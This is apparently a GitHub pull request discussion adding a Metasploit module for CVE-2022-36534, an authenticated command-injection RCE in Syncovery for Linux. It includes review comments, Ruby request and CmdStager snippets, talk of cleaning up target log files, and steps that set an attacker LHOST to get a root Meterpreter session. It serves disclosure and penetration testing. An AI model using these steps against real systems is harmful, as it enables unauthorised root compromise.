Syncovery For Linux - Auth. RCE (CVE-2022-36534) #16992
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:
You can automate most of these changes with the
Please update your branch after these have been made, and reach out if you have any problems.
Hi, any suggestion on how to fix this?
The tests are failing due to a
Instead of:

```ruby
send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/post_applogin.php?login=#{datastore['USERNAME']}") })
```

Do:

```ruby
send_request_cgi({
  'uri' => normalize_uri(target_uri.path, '/post_applogin.php'),
  'vars_get' => { 'login' => datastore['USERNAME'].to_s }
})
```
Thanks! This should do the trick.
Thanks again @whoot for the exploit module! I left some comments and suggestions for you to review when you get a chance.
One more thing I would like to suggest is the use of the `CmdStager` mixin. Please refer to the documentation for details. The main benefit of using the `CmdStager` mixin is that it is possible to send payloads of any size: the mixin will take care of splitting the payload up and rebuilding it on the target before executing it. Basically, you will just have to move the code from `exploit` to a new `execute_command` method and use something along these lines in the `exploit` method, assuming you set up the targets as I suggested in this comment:

```ruby
case target['Type']
when :unix_memory
  execute_command(payload.encoded)
when :linux_dropper
  execute_cmdstager
end
```
This module is a good example.
Thanks @whoot! These changes look good to me. However, it doesn't seem to work properly in my environment:
I tracked down the issue and it looks like the profile gets deleted before the payload is executed. I just added a
That said, using
Regarding using the
I will look into it and see what I can do.
Tried to use the cleanup method and file_rm, but always getting the following error message:
The Meterpreter shell is there, but the cleanup of log files is not working.
Did as much as I could, but could not solve the "undefined local variable or method 'session'" issue.
Thanks for updating this @whoot! I added some suggestions to handle the issue you reported. Please let me know if this works for you.
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
So, I think the module is good to go now. Thank you so much for your support and for helping me out with all this stuff. Really appreciate it!
Thanks @whoot! I'm happy to hear the feedback was useful! It looks good to me now! I tested against Syncovery version 9.47a and I got a session as the root user. I'll go ahead and land it!
Release Notes
This adds a module that exploits an authenticated remote code execution vulnerability identified as CVE-2022-36534 in the Web GUI of Syncovery File Sync & Backup Software for Linux. The module leverages a flaw in the application that allows the creation of jobs that will be executed when a profile is run. This allows the execution of arbitrary commands as the root user.
This pull request adds the following module for a vulnerability found in Syncovery for Linux.
The vulnerability has been communicated to the vendor and is fixed in the current release. CVE is pending.
A vulnerable version can be downloaded from the vendor website: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
CVE-2022-36534: Authenticated Remote Code Execution
Syncovery allows users to execute a command or script before or after running a profile.
Since it is possible to inject arbitrary commands, an authenticated attacker can get root access to the host by inserting a crafted payload.
Verification
- Download and install a vulnerable version
- `use exploit/unix/http/syncovery_linux_rce_2022_36534`
- `set RHOSTS <TARGET HOSTS>`
- `set LHOST <Address of Attacking Machine>`
- `run`
- root user.

More information can be found on our website: https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/